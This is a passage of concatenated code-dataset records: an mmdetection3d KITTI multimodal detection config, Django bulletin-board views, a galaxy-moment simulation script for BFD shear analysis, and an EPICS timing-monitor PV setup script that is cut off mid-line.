with_voxel_center=True,\n point_cloud_range=point_cloud_range,\n fusion_layer=dict(\n 
type=PointFusion,\n img_channels=256,\n pts_channels=64,\n mid_channels=128,\n out_channels=128,\n img_levels=[0, 1, 2, 3, 4],\n align_corners=False,\n activate_out=True,\n fuse_out=False)),\n pts_middle_encoder=dict(\n type=SparseEncoder,\n in_channels=128,\n sparse_shape=[41, 1600, 1408],\n order=('conv', 'norm', 'act')),\n pts_backbone=dict(\n type=SECOND,\n in_channels=256,\n layer_nums=[5, 5],\n layer_strides=[1, 2],\n out_channels=[128, 256]),\n pts_neck=dict(\n type=SECONDFPN,\n in_channels=[128, 256],\n upsample_strides=[1, 2],\n out_channels=[256, 256]),\n pts_bbox_head=dict(\n type=Anchor3DHead,\n num_classes=3,\n in_channels=512,\n feat_channels=512,\n use_direction_classifier=True,\n anchor_generator=dict(\n type=Anchor3DRangeGenerator,\n ranges=[\n [0, -40.0, -0.6, 70.4, 40.0, -0.6],\n [0, -40.0, -0.6, 70.4, 40.0, -0.6],\n [0, -40.0, -1.78, 70.4, 40.0, -1.78],\n ],\n sizes=[[0.8, 0.6, 1.73], [1.76, 0.6, 1.73], [3.9, 1.6, 1.56]],\n rotations=[0, 1.57],\n reshape_out=False),\n assigner_per_size=True,\n diff_rad_by_sin=True,\n assign_per_class=True,\n bbox_coder=dict(type=DeltaXYZWLHRBBoxCoder),\n loss_cls=dict(\n type='mmdet.FocalLoss',\n use_sigmoid=True,\n gamma=2.0,\n alpha=0.25,\n loss_weight=1.0),\n loss_bbox=dict(\n type='mmdet.SmoothL1Loss', beta=1.0 / 9.0, loss_weight=2.0),\n loss_dir=dict(\n type='mmdet.CrossEntropyLoss', use_sigmoid=False,\n loss_weight=0.2)),\n # model training and testing settings\n train_cfg=dict(\n pts=dict(\n assigner=[\n dict( # for Pedestrian\n type=Max3DIoUAssigner,\n iou_calculator=dict(type=BboxOverlapsNearest3D),\n pos_iou_thr=0.35,\n neg_iou_thr=0.2,\n min_pos_iou=0.2,\n ignore_iof_thr=-1),\n dict( # for Cyclist\n type=Max3DIoUAssigner,\n iou_calculator=dict(type=BboxOverlapsNearest3D),\n pos_iou_thr=0.35,\n neg_iou_thr=0.2,\n min_pos_iou=0.2,\n ignore_iof_thr=-1),\n dict( # for Car\n type=Max3DIoUAssigner,\n iou_calculator=dict(type=BboxOverlapsNearest3D),\n pos_iou_thr=0.6,\n neg_iou_thr=0.45,\n min_pos_iou=0.45,\n ignore_iof_thr=-1),\n ],\n allowed_border=0,\n pos_weight=-1,\n debug=False)),\n test_cfg=dict(\n pts=dict(\n use_rotate_nms=True,\n nms_across_levels=False,\n nms_thr=0.01,\n score_thr=0.1,\n min_bbox_size=0,\n nms_pre=100,\n max_num=50)))\n\n# dataset settings\ndataset_type = 'KittiDataset'\ndata_root = 'data/kitti/'\nclass_names = ['Pedestrian', 'Cyclist', 'Car']\nmetainfo = dict(classes=class_names)\ninput_modality = dict(use_lidar=True, use_camera=True)\nbackend_args = None\ntrain_pipeline = [\n dict(\n type=LoadPointsFromFile,\n coord_type='LIDAR',\n load_dim=4,\n use_dim=4,\n backend_args=backend_args),\n dict(type=LoadImageFromFile, backend_args=backend_args),\n dict(type=LoadAnnotations3D, with_bbox_3d=True, with_label_3d=True),\n dict(type=RandomResize, scale=[(640, 192), (2560, 768)], keep_ratio=True),\n dict(\n type=GlobalRotScaleTrans,\n rot_range=[-0.78539816, 0.78539816],\n scale_ratio_range=[0.95, 1.05],\n translation_std=[0.2, 0.2, 0.2]),\n dict(type=RandomFlip3D, flip_ratio_bev_horizontal=0.5),\n dict(type=PointsRangeFilter, point_cloud_range=point_cloud_range),\n dict(type=ObjectRangeFilter, point_cloud_range=point_cloud_range),\n dict(type=PointShuffle),\n dict(\n type=Pack3DDetInputs,\n keys=[\n 'points', 'img', 'gt_bboxes_3d', 'gt_labels_3d', 'gt_bboxes',\n 'gt_labels'\n ])\n]\ntest_pipeline = [\n dict(\n type=LoadPointsFromFile,\n coord_type='LIDAR',\n load_dim=4,\n use_dim=4,\n backend_args=backend_args),\n dict(type=LoadImageFromFile, backend_args=backend_args),\n dict(\n type=MultiScaleFlipAug3D,\n 
img_scale=(1280, 384),\n pts_scale_ratio=1,\n flip=False,\n transforms=[\n # Temporary solution, fix this after refactor the augtest\n dict(type=Resize, scale=0, keep_ratio=True),\n dict(\n type=GlobalRotScaleTrans,\n rot_range=[0, 0],\n scale_ratio_range=[1., 1.],\n translation_std=[0, 0, 0]),\n dict(type=RandomFlip3D),\n dict(type=PointsRangeFilter, point_cloud_range=point_cloud_range),\n ]),\n dict(type=Pack3DDetInputs, keys=['points', 'img'])\n]\nmodality = dict(use_lidar=True, use_camera=True)\ntrain_dataloader = dict(\n batch_size=2,\n num_workers=2,\n sampler=dict(type=DefaultSampler, shuffle=True),\n dataset=dict(\n type=RepeatDataset,\n times=2,\n dataset=dict(\n type=KittiDataset,\n data_root=data_root,\n modality=modality,\n ann_file='kitti_infos_train.pkl',\n data_prefix=dict(\n pts='training/velodyne_reduced', img='training/image_2'),\n pipeline=train_pipeline,\n filter_empty_gt=False,\n metainfo=metainfo,\n # we use box_type_3d='LiDAR' in kitti and nuscenes dataset\n # and box_type_3d='Depth' in sunrgbd and scannet dataset.\n box_type_3d='LiDAR',\n backend_args=backend_args)))\n\nval_dataloader = dict(\n batch_size=1,\n num_workers=1,\n sampler=dict(type=DefaultSampler, shuffle=False),\n dataset=dict(\n type=KittiDataset,\n data_root=data_root,\n modality=modality,\n ann_file='kitti_infos_val.pkl',\n data_prefix=dict(\n pts='training/velodyne_reduced', img='training/image_2'),\n pipeline=test_pipeline,\n metainfo=metainfo,\n test_mode=True,\n box_type_3d='LiDAR',\n backend_args=backend_args))\ntest_dataloader = dict(\n batch_size=1,\n num_workers=1,\n sampler=dict(type=DefaultSampler, shuffle=False),\n dataset=dict(\n type=KittiDataset,\n data_root=data_root,\n ann_file='kitti_infos_val.pkl',\n modality=modality,\n data_prefix=dict(\n pts='training/velodyne_reduced', img='training/image_2'),\n pipeline=test_pipeline,\n metainfo=metainfo,\n test_mode=True,\n box_type_3d='LiDAR',\n backend_args=backend_args))\n\noptim_wrapper.update(\n dict(\n optimizer=dict(weight_decay=0.01),\n clip_grad=dict(max_norm=35, norm_type=2),\n ))\nval_evaluator = dict(\n type=KittiMetric, ann_file='data/kitti/kitti_infos_val.pkl')\ntest_evaluator = val_evaluator\n\nvis_backends = [dict(type=LocalVisBackend)]\nvisualizer = dict(\n type=Det3DLocalVisualizer, vis_backends=vis_backends, name='visualizer')\n\n# You may need to download the model first is the network is unstable\nload_from = 'https://download.openmmlab.com/mmdetection3d/pretrain_models/mvx_faster_rcnn_detectron2-caffe_20e_coco-pretrain_gt-sample_kitti-3-class_moderate-79.3_20200207-a4a6a3c7.pth' # noqa\n","repo_name":"open-mmlab/mmdetection3d","sub_path":"mmdet3d/configs/mvxnet/mvxnet_fpn_dv_second_secfpn_8xb2_80e_kitti_3d_3class.py","file_name":"mvxnet_fpn_dv_second_secfpn_8xb2_80e_kitti_3d_3class.py","file_ext":"py","file_size_in_byte":11256,"program_lang":"python","lang":"en","doc_type":"code","stars":4289,"dataset":"github-code","pt":"92"} +{"seq_id":"70473879659","text":"\nfrom django.http import HttpResponseNotFound\nfrom django.shortcuts import render\nfrom django.urls import reverse_lazy\nfrom django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\n\nfrom .filters import CommentFilter\nfrom .forms import *\nfrom .models import *\nfrom .utils import *\n\n\nclass BulletinList(DataMixin, ListView):\n model = Bulletin\n template_name = 'board/index.html'\n context_object_name = 'bulletins'\n\n def get_context_data(self, *, object_list=None, 
**kwargs):\n context = super().get_context_data(**kwargs)\n c_def = self.get_user_context(title=\"Главная страница\")\n return dict(list(context.items()) + list(c_def.items()))\n\n\n def get_queryset(self):\n return Bulletin.objects.all()\n\n\ndef about(request):\n return render(request, 'board/about.html', {'menu': menu, 'title': 'О сайте'})\n\nclass AddBulletin(LoginRequiredMixin, DataMixin, CreateView):\n form_class = AddBulletinForm\n model = Bulletin\n template_name = 'board/addbulletin.html'\n # success_url = reverse_lazy('home')\n login_url = reverse_lazy('login')\n raise_exception = True\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n c_def = self.get_user_context(title=\"Добавление объявления\")\n return dict(list(context.items()) + list(c_def.items()))\n\nclass EditBulletin(LoginRequiredMixin, DataMixin, UpdateView):\n form_class = AddBulletinForm\n model = Bulletin\n template_name = 'board/addbulletin.html'\n # success_url = reverse_lazy('home')\n login_url = reverse_lazy('login')\n raise_exception = True\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n c_def = self.get_user_context(title=\"Редактирование объявления\")\n return dict(list(context.items()) + list(c_def.items()))\n\n\n\nclass AddReply(LoginRequiredMixin, DataMixin, CreateView):\n form_class = AddReplyForm\n model = Comment\n template_name = 'board/addreply.html'\n success_url = reverse_lazy('home')\n login_url = reverse_lazy('login')\n raise_exception = True\n\n\nclass CategoryList(DataMixin, ListView):\n model = Bulletin\n template_name = 'board/index.html'\n context_object_name = 'bulletins'\n allow_empty = False\n\n def get_queryset(self):\n return Bulletin.objects.filter(cat__id=self.kwargs['cat_id'])\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n c_def = self.get_user_context(title='Категория - ' + str(context['bulletins'][0].cat),\n cat_selected=context['bulletins'][0].cat_id)\n return dict(list(context.items()) + list(c_def.items()))\n\nclass ProfileList(DataMixin, ListView):\n model = Comment\n template_name = 'board/profile.html'\n context_object_name = 'comments'\n # allow_empty = False\n\n def get_queryset(self):\n queryset = Comment.objects.filter(bulletin__user=self.request.user.id)\n self.filterset = CommentFilter(self.request.GET, queryset)\n return self.filterset.qs\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['filterset'] = self.filterset\n return context\n\n\nclass ShowBulletin(DataMixin, DetailView):\n model = Bulletin\n template_name = 'board/bulletin.html'\n context_object_name = 'bulletin'\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n c_def = self.get_user_context(title=context['bulletin'], flag=(self.object.user==self.request.user))\n return dict(list(context.items()) + list(c_def.items()))\n\n\n\ndef pageNotFound(request, exception):\n return HttpResponseNotFound('<h1>Страница не найдена</h1>')\n\n\nclass CommentConfirm(UpdateView):\n form_class = ConfirmCommentForm\n model = Comment\n template_name = 'board/comment_confirm.html'\n success_url = reverse_lazy('profile')\n\nclass CommentDelete(DeleteView):\n model = Comment\n template_name = 'board/comment_delete.html'\n success_url = reverse_lazy('profile')\n\n\nclass NewsList(DataMixin, ListView):\n model = News\n template_name = 
'board/news.html'\n context_object_name = 'news'\n\n\nclass ShowNew(DataMixin, DetailView):\n model = News\n template_name = 'board/new.html'\n context_object_name = 'new'\n\n\n\n\n\n","repo_name":"TsupkoOlga/mybb","sub_path":"mygamebb/board/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"42639986025","text":"#!/usr/bin/env python\n'''\ncode to run a target or template simulation\n'''\nimport sys\nimport os\nimport math\nimport logging\nimport argparse\nimport time\n\nimport yaml\nimport numpy as np\n#import matplotlib.pyplot as plt \nimport astropy.io.fits as fits\nimport bfd\nimport pdb\n\ndef install_args_and_defaults(params, args, defaults, arg_prefix=\"\"):\n '''\n For each key of the defaults dictionary, put the params value in the dictionary as\n * the value in args, if there is one - apply arg_prefix to parameter name\n * else the value already present in params stays, if there is one\n * else insert the defaults value, if it's not None\n * else do nothing\n '''\n for pname in defaults.keys():\n pval = eval('args.' + arg_prefix + pname)\n if pval is None:\n if defaults[pname] is not None and pname not in params:\n params[pname] = defaults[pname]\n else:\n params[pname] = pval\n return\n\ndef parse_input():\n '''Read command-line arguments and any specified YAML config files,\n returning dictionary of parameter values.\n '''\n parser = argparse.ArgumentParser(\n description='Simulate population of target or template galaxies.\\n'\n 'Command-line args take precedence over parameters in config files.',\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n # Config file names - do not get passed back to program.\n parser.add_argument('--config_file', '-c',\n help='Configuration file name(s), if any, in order of increasing precedence',\n type=str, nargs='*')\n parser.add_argument('--save_config', type=str,\n nargs='?', const=\"\", # Comes back with null string if given w/o argument\n help='File in which to save configuration. With no argument, will dump a '\n 'configuration file to stderr' ) \n parser.add_argument('--outfile', '-o', help='Output moments file', type=str)\n parser.add_argument('--logfile', '-l', help='Logfile name', type=str)\n parser.add_argument('--verbose', '-v', help='Increase logging detail', action='count')\n\n group = parser.add_mutually_exclusive_group()\n group.add_argument('--targets', help='Make target galaxies -OR-', action='store_const', const=True)\n group.add_argument('--templates', help='Make template galaxies', action='store_const', const=True)\n \n parser.add_argument('--dir', help='Directory for files', type=str)\n parser.add_argument('--ngals', '-n', help='Number of galaxies to draw', type=int)\n parser.add_argument('--image_size', help='Pixels across postage stamps', type=int)\n parser.add_argument('--pad_factor',help='factor by which to zero pad original stamp size specified by --image_size, default=1, no padding',type=int)\n parser.add_argument('--pixel_scale', help='Sky units per pixel', type=float)\n parser.add_argument('--shear', help='Shear applied to targets', type=float, nargs=2)\n\n defaults = {'dir':\"\",\n 'outfile':None, # ??? 
No default for output\n 'logfile':None, # log to screen by default\n 'ngals':10,\n 'image_size':48,\n 'pad_factor':1,\n 'pixel_scale':1.,\n 'shear': [0.02, 0.0] }\n\n group = parser.add_argument_group(title='PSF',description='PSF parameters')\n group.add_argument('--psf_type', help='PSF type', type=str)\n group.add_argument('--psf_args', help='PSF construction arguments', nargs='*', type=float)\n group.add_argument('--psf_e', help='PSF ellipticity components', nargs=2, type=float)\n defaults_psf = {'type':'Moffat',\n 'args':[1.5, 3.5],\n 'e':[0., 0.02]}\n\n group = parser.add_argument_group(title='Weights',description='Weight parameters')\n group.add_argument('--wt_n', help='Weight function index', type=int)\n group.add_argument('--wt_sigma', help='Weight function sigma', type=float)\n defaults_wt = {'n':4,\n 'sigma':3.5}\n\n group = parser.add_argument_group(title='Galaxies',description='Galaxy population parameters')\n group.add_argument('--gal_sn_range', help='Approx flux moment S/N range', nargs=2, type=float)\n group.add_argument('--gal_hlr_range', help='Half-light radius range', nargs=2, type=float)\n group.add_argument('--gal_noise_var', help='Noise variance', type=float)\n group.add_argument('--gal_e_sigma', help='Intrinsic ellipticity RMS per component', type=float)\n group.add_argument('--gal_seed', help='Galaxy generator seed', type=int)\n group.add_argument('--gal_fixsersic',help='If want to fix to be only disk (1) or bulge (2) or 2d gaussian (3), default is combination (0)', type=int)\n defaults_gal = {'sn_range':[5., 25.],\n 'hlr_range':[1.5, 3.0],\n 'noise_var':100.,\n 'e_sigma':0.2,\n 'seed':0,\n 'fixsersic':0\n}\n\n\n group = parser.add_argument_group(title='Templates',description='Template replication specs')\n group.add_argument('--tmpl_target_file',\n help='Get sigma and weight info from this target table file. 
'\n 'Values in file take precedence over any provided in config '\n 'or command line', type=str)\n group.add_argument('--tmpl_noise_factor', help='Noise level relative to targets', type=float)\n group.add_argument('--tmpl_sn_min', help='Lower flux moment S/N cut on targets', type=float)\n group.add_argument('--tmpl_sigma_xy', help='Measurement error on xy moments', type=float)\n group.add_argument('--tmpl_sigma_flux', help='Measurement error on flux moments', type=float)\n group.add_argument('--tmpl_sigma_max', help='Maximum sigma deviation to replicate', type=float)\n group.add_argument('--tmpl_sigma_step', help='Sigma step for template replication', type=float)\n group.add_argument('--tmpl_xy_max', help='Maximum allowed centroid for replication', type=float)\n defaults_tmpl = {'target_file':None,\n 'noise_factor':0., # No noise on templates by default\n 'sigma_xy': None, # No defaults for measurement errors, must be given\n 'sigma_flux': None, # or obtained from a target_file\n 'sn_min': 5.,\n 'sigma_max':6.5,\n 'sigma_step':1.0,\n 'xy_max':2.}\n \n args = parser.parse_args()\n\n\n # Set up our master parameter dictionary\n params = {}\n # We require certain sub-dictionaries to be present\n params['PSF'] = {}\n params['WEIGHT'] = {}\n params['GALAXY'] = {}\n params['TEMPLATE'] = {}\n\n # Read YAML configuration files\n if args.config_file is not None:\n for f in args.config_file:\n params.update( yaml.load(open(f)) )\n \n # Override with any command-line options, install defaults\n install_args_and_defaults(params, args, defaults)\n install_args_and_defaults(params['PSF'], args, defaults_psf, arg_prefix='psf_')\n install_args_and_defaults(params['WEIGHT'], args, defaults_wt, arg_prefix='wt_')\n install_args_and_defaults(params['GALAXY'], args, defaults_gal, arg_prefix='gal_')\n install_args_and_defaults(params['TEMPLATE'], args, defaults_tmpl, arg_prefix='tmpl_')\n\n if args.templates is not None:\n params['make_template'] = True\n elif args.targets is not None or 'make_template' not in params:\n # Default is to make targets\n params['make_template'] = False\n \n # After all parameters are set, save to YAML if requested\n if args.save_config is not None:\n if len(args.save_config)==0:\n # Empty arg means dump to stderr and quit\n yaml.dump(params, sys.stderr)\n sys.exit(1)\n # otherwise save to file and continue\n fout = open(args.save_config, 'w')\n yaml.dump(params, fout)\n fout.close()\n\n # Set up logfile if there is one\n if args.verbose is None or args.verbose==0:\n level = logging.WARNING\n elif args.verbose ==1:\n level = logging.INFO\n elif args.verbose >=2:\n level = logging.DEBUG\n if args.logfile is None:\n # Logging to screen, set level\n logging.basicConfig(level = level)\n else:\n logging.basicConfig(filename = os.path.join(params['dir'],args.logfile),\n filemode='w',\n level = level)\n return params\n\ndef check_params(params):\n ''' Check that parameters are in range, and do any other processing\n necessary, including extracting sigma parameters from a target file\n if one was given.\n '''\n\n # Must have an outfile specified:\n if 'outfile' not in params:\n raise Exception(\"Must specify an outfile\")\n\n if np.hypot(params['shear'][0],params['shear'][1]) >= 1.:\n raise Exception('Shear cannot be >=1')\n \n if not 0 <= params['GALAXY']['fixsersic'] <= 3:\n raise Exception('Must give valid value (0-3) to fixsersic')\n\n # Get template parameters from a target file, if one is given\n if 'target_file' in params['TEMPLATE'] and params['make_template']:\n fitsfile = 
os.path.join(params['dir'],params['TEMPLATE']['target_file'])\n if os.path.isfile(fitsfile):\n hdu = fits.open(fitsfile)[0];\n M0 = bfd.Moment().M0 # Index for flux moment\n params['TEMPLATE']['sigma_xy'] = np.sqrt(hdu.header['COVMXMX'])\n params['TEMPLATE']['sigma_flux'] = np.sqrt(hdu.data[M0][M0])\n params['WEIGHT']['n'] = hdu.header['WT_N']\n params['WEIGHT']['sigma'] = hdu.header['WT_SIG']\n else:\n raise Exception(\"Could not access target_file \" + fitsfile)\n\n\ndef main(params):\n # Check the parameters for sanity\n check_params(params)\n template = params['make_template']\n\n # define center of arrays - 2d array\n cent = int(params['image_size']/2.)\n cent = np.array([cent,cent], dtype=float)\n \n psf = bfd.define_psf(**params['PSF'])\n psfarr = bfd.return_array(psf,**params)\n\n # create galaxy generator - shear them only for targets\n if template:\n galaxy = bfd.GalaxyGenerator(flux_range=[1.,2.], pixel_scale = params['pixel_scale'],**params['GALAXY'])\n else:\n galaxy = bfd.GalaxyGenerator(g=params['shear'],flux_range=[1.,2.],pixel_scale = params['pixel_scale'],**params['GALAXY'])\n # create weight function\n wt = bfd.KBlackmanHarris(**params['WEIGHT'])\n\n # Set up noise level\n noise_var = params['GALAXY']['noise_var']\n\n # Set flux range on galaxy generator to produce flux moments in desired range\n # And get the covariance for targets\n # set up a galaxy with S/N = 1 (F = sqrt(sigma^2))\n gal = galaxy.nominal(flux=np.sqrt(noise_var)) \n # create an image with 0 noise\n im = bfd.return_array(gal,\n noise_var = 0.0,\n use_gaussian_noise = True,\n convolve_with_psf = True,\n psf=psf,\n **params)\n kdata = bfd.simpleImage(im,cent,psfarr,\n pixel_scale=params['pixel_scale'],\n pixel_noise=np.sqrt(noise_var),\n pad_factor=params['pad_factor'])\n\n mc = bfd.MomentCalculator(kdata,wt)\n mom = mc.get_moment(0.,0.)\n cov = mc.get_covariance()\n # Flux needed to have S/N=1 on flux moment:\n # S/N_gal = b * S/N_MF\n # F/sigma = b * MF/sqrt(Cov_MF)\n # for F/Sigma = 1: b = sqrt(COV_MF)/MF\n fluxSN1 = (np.sqrt(cov[0][mom.M0,mom.M0]) / mom.even[mom.M0]) * np.sqrt(noise_var)\n # F = fluxSN1 * SN\n galaxy.flux_range = [fluxSN1*sn for sn in params['GALAXY']['sn_range']]\n\n if template:\n # Reduce or eliminate noise for templates\n if 'noise_factor' in params['TEMPLATE']:\n noise_var *= params['TEMPLATE']['noise_factor']\n else:\n noise_var = 0.\n\n # setup classes to save results\n if template:\n tab = bfd.TemplateTable(n = params['WEIGHT']['n'],\n sigma = params['WEIGHT']['sigma'],\n **params['TEMPLATE'])\n else:\n # Initialize the output table\n tab = bfd.TargetTable(n = params['WEIGHT']['n'],\n sigma = params['WEIGHT']['sigma'],\n cov=cov)\n\n\n # loop over galaxies\n for i in xrange(params['ngals']):\n # generate galaxy, image and k-image\n gal = galaxy.sample()\n\n im = bfd.return_array(gal,\n noise_var = noise_var,\n use_gaussian_noise = True,\n convolve_with_psf = True,\n psf=psf,\n **params)\n\n kdata = bfd.simpleImage(im,cent,psfarr,\n pixel_scale=params['pixel_scale'],\n pixel_noise=np.sqrt(noise_var),\n pad_factor=params['pad_factor'])\n\n # start moment calculator\n m = bfd.MomentCalculator(kdata,wt,id=i,nda=1./params['ngals'])\n\n\n # if template, save even & odd moments and derivs from iterating around\n if template:\n # run procedure to obtain templates at different coords near galaxy center\n t = m.make_templates(**params['TEMPLATE'])\n if t[0] is None:\n logging.warning(t[1] + \" for %sth galaxy\" %(i))\n else:\n for tmpl in t:\n tab.add(tmpl)\n else:\n # if target get 
moments at MX=MY=0 (only care about even moments)\n xyshift, error, msg = m.recenter()\n if error:\n logging.warning(\"recentering did not work for %sth galaxy: %s\" %(i,msg))\n tab.addLost()\n else:\n tab.add(m.get_moment(0,0), xy=xyshift, id=i)\n # save out binary fits files\n tab.save(os.path.join(params['dir'],params['outfile']))\n\n\nif __name__ == '__main__':\n params = parse_input()\n\n aa=time.clock()\n aaa=time.time()\n\n # run program to produced target/template galaxies and save their moments in a fits file\n main(params)\n\n bb=time.clock()\n bbb=time.time()\n logging.info(\"run time %s\" %(bb-aa))\n logging.info(\"clock time %s\" %(bbb-aaa))\n\n sys.exit(0)\n","repo_name":"mgatti29/bfd_desy6kp","sub_path":"src/runsim.py","file_name":"runsim.py","file_ext":"py","file_size_in_byte":14523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"20287595114","text":"import numpy as np\nimport epics\nfrom bsread import source\n\n# BAM Channels data taken from bs\n#BAM1 = 'S10BC01-DBAM070:EOM1_T1'\nBAM1 = 'SARES11-LSCP10-FNS:CH1:VAL_GET' ###############\n\n# PACM PVs\nLAS_XRAY_ERR = 'SLAAR11-GEN:LAS-XRAY-ERR'\nLAS_XRAY_MSG = 'SLAAR11-GEN:LAS-XRAY-MSGD'\nLAS_XRAY_REF = 'SLAAR11-GEN:LAS-XRAY-REF'\nLAS_XRAY_BAD = 'SLAAR11-GEN:LAS-XRAY-BAD'\nLAS_XRAY = 'SLAAR11-GEN:LAS-XRAY'\n\nLAS_EVR_ERR = 'SLAAR11-GEN:LAS-EVR-ERR'\nLAS_EVR_MSG = 'SLAAR11-GEN:LAS-EVR-MSGD'\nLAS_EVR_REF = 'SLAAR11-GEN:LAS-EVR-REF'\nLAS_EVR_BAD = 'SLAAR11-GEN:LAS-EVR-BAD'\nLAS_EVR = 'SLAAR11-GEN:LAS-EVR'\n\nXRAY_EVR_ERR = 'SLAAR11-GEN:XRAY-EVR-ERR'\nXRAY_EVR_MSG = 'SLAAR11-GEN:XRAY-EVR-MSGD'\nXRAY_EVR_REF = 'SLAAR11-GEN:XRAY-EVR-REF'\nXRAY_EVR_BAD = 'SLAAR11-GEN:XRAY-EVR-BAD'\nXRAY_EVR = 'SLAAR11-GEN:XRAY-EVR'\n\n# Setup of PACM PVs\nLAS_XRAY_ERR_pv = epics.PV(LAS_XRAY_ERR)\nLAS_XRAY_MSG_pv = epics.PV(LAS_XRAY_MSG)\nLAS_XRAY_REF_pv = epics.PV(LAS_XRAY_REF)\nLAS_XRAY_BAD_pv = epics.PV(LAS_XRAY_BAD)\nLAS_XRAY_pv = epics.PV(LAS_XRAY)\n\nLAS_EVR_ERR_pv = epics.PV(LAS_EVR_ERR)\nLAS_EVR_MSG_pv = epics.PV(LAS_EVR_MSG)\nLAS_EVR_REF_pv = epics.PV(LAS_EVR_REF)\nLAS_EVR_BAD_pv = epics.PV(LAS_EVR_BAD)\nLAS_EVR_pv = epics.PV(LAS_EVR)\n\nXRAY_EVR_ERR_pv = epics.PV(XRAY_EVR_ERR)\nXRAY_EVR_MSG_pv = epics.PV(XRAY_EVR_MSG)\nXRAY_EVR_REF_pv = epics.PV(XRAY_EVR_REF)\nXRAY_EVR_BAD_pv = epics.PV(XRAY_EVR_BAD)\nXRAY_EVR_pv = epics.PV(XRAY_EVR)\n\n# PALM PVs\nPALM_LIVE_ERR = 'SLAAR11-GEN:PALM-LIVE-ERR'\nPALM_LIVE_MSG = 'SLAAR11-GEN:PALM-LIVE-MSGD'\nPALM_LIVE_REF = 'SLAAR11-GEN:PALM-LIVE-REF'\nPALM_LIVE_BAD = 'SLAAR11-GEN:PALM-LIVE-BAD'\nPALM_LIVE = 'SAROP11-PALMK118:LIVE'\n\nPALM_RAVE_ERR = 'SLAAR11-GEN:PALM-RAVE-ERR'\nPALM_RAVE_MSG = 'SLAAR11-GEN:PALM-RAVE-MSGD'\nPALM_RAVE_REF = 'SLAAR11-GEN:PALM-RAVE-REF'\nPALM_RAVE_BAD = 'SLAAR11-GEN:PALM-RAVE-BAD'\nPALM_RAVE = 'SAROP11-PALMK118:RAVE'\n\n# Setup of PALM PVs\nPALM_LIVE_ERR_pv = epics.PV(PALM_LIVE_ERR)\nPALM_LIVE_MSG_pv = epics.PV(PALM_LIVE_MSG)\nPALM_LIVE_REF_pv = epics.PV(PALM_LIVE_REF)\nPALM_LIVE_BAD_pv = epics.PV(PALM_LIVE_BAD)\nPALM_LIVE_pv = epics.PV(PALM_LIVE)\n\nPALM_RAVE_ERR_pv = epics.PV(PALM_RAVE_ERR)\nPALM_RAVE_MSG_pv = epics.PV(PALM_RAVE_MSG)\nPALM_RAVE_REF_pv = epics.PV(PALM_RAVE_REF)\nPALM_RAVE_BAD_pv = epics.PV(PALM_RAVE_BAD)\nPALM_RAVE_pv = epics.PV(PALM_RAVE)\n\n# PPROBE PVs\nPPROBE_LIVE_ERR = 'SLAAR11-GEN:PPROBE-ERR'\nPPROBE_LIVE_MSG = 'SLAAR11-GEN:PPROBE-MSGD'\nPPROBE_LIVE_REF = 'SLAAR11-GEN:PPROBE-REF'\nPPROBE_LIVE_BAD = 'SLAAR11-GEN:PPROBE-BAD'\nPPROBE_LIVE = 'SLAAR11-PPROBE:LIVE'\n\nPPROBE_RAVE_ERR = 
'SLAAR11-GEN:PP-RAVE-ERR'\nPPROBE_RAVE_MSG = 'SLAAR11-GEN:PP-RAVE-MSGD'\nPPROBE_RAVE_REF = 'SLAAR11-GEN:PP-RAVE-REF'\nPPROBE_RAVE_BAD = 'SLAAR11-GEN:PP-RAVE-BAD'\nPPROBE_RAVE = 'SLAAR11-PPROBE:RAVE'\n\n# Setup of PPROBE PVs\nPPROBE_LIVE_ERR_pv = epics.PV(PPROBE_LIVE_ERR)\nPPROBE_LIVE_MSG_pv = epics.PV(PPROBE_LIVE_MSG)\nPPROBE_LIVE_REF_pv = epics.PV(PPROBE_LIVE_REF)\nPPROBE_LIVE_BAD_pv = epics.PV(PPROBE_LIVE_BAD)\nPPROBE_LIVE_pv = epics.PV(PPROBE_LIVE)\n\nPPROBE_RAVE_ERR_pv = epics.PV(PPROBE_RAVE_ERR)\nPPROBE_RAVE_MSG_pv = epics.PV(PPROBE_RAVE_MSG)\nPPROBE_RAVE_REF_pv = epics.PV(PPROBE_RAVE_REF)\nPPROBE_RAVE_BAD_pv = epics.PV(PPROBE_RAVE_BAD)\nPPROBE_RAVE_pv = epics.PV(PPROBE_RAVE)\n\n# BAM PVs\nBAM1_ERR = 'SLAAR11-GEN:BAM070-ERR'\nBAM1_MSG = 'SLAAR11-GEN:BAM070-MSGD'\nBAM1_REF = 'SLAAR11-GEN:BAM070-REF'\nBAM1_BAD = 'SLAAR11-GEN:BAM070-BAD'\n\n# Setup of BAM PVs\nBAM1_ERR_pv = epics.PV(BAM1_ERR)\nBAM1_MSG_pv = epics.PV(BAM1_MSG)\nBAM1_REF_pv = epics.PV(BAM1_REF)\nBAM1_BAD_pv = epics.PV(BAM1_BAD)\n\n# LAM PVs\nLAM252_ERR = 'SLAAR11-GEN:LAM252-ERR'\nLAM252_MSG = 'SLAAR11-GEN:LAM252-MSGD'\nLAM252_REF = 'SLAAR11-GEN:LAM252-REF'\nLAM252_BAD = 'SLAAR11-GEN:LAM252-BAD'\nLAM252 = 'SLAAR01-LMOT-M252:MOT.RBV'\n\nLAM11_ERR = 'SLAAR11-GEN:LAM11-ERR'\nLAM11_MSG = 'SLAAR11-GEN:LAM11-MSGD'\nLAM11_REF = 'SLAAR11-GEN:LAM11-REF'\nLAM11_BAD = 'SLAAR11-GEN:LAM11-BAD'\nLAM11= 'SLAAR11-GEN:LAM11'\n\n# Setup of LAM PVs\nLAM252_ERR_pv = epics.PV(LAM252_ERR)\nLAM252_MSG_pv = epics.PV(LAM252_MSG)\nLAM252_REF_pv = epics.PV(LAM252_REF)\nLAM252_BAD_pv = epics.PV(LAM252_BAD)\nLAM252_pv = epics.PV(LAM252)\n\nLAM11_ERR_pv = 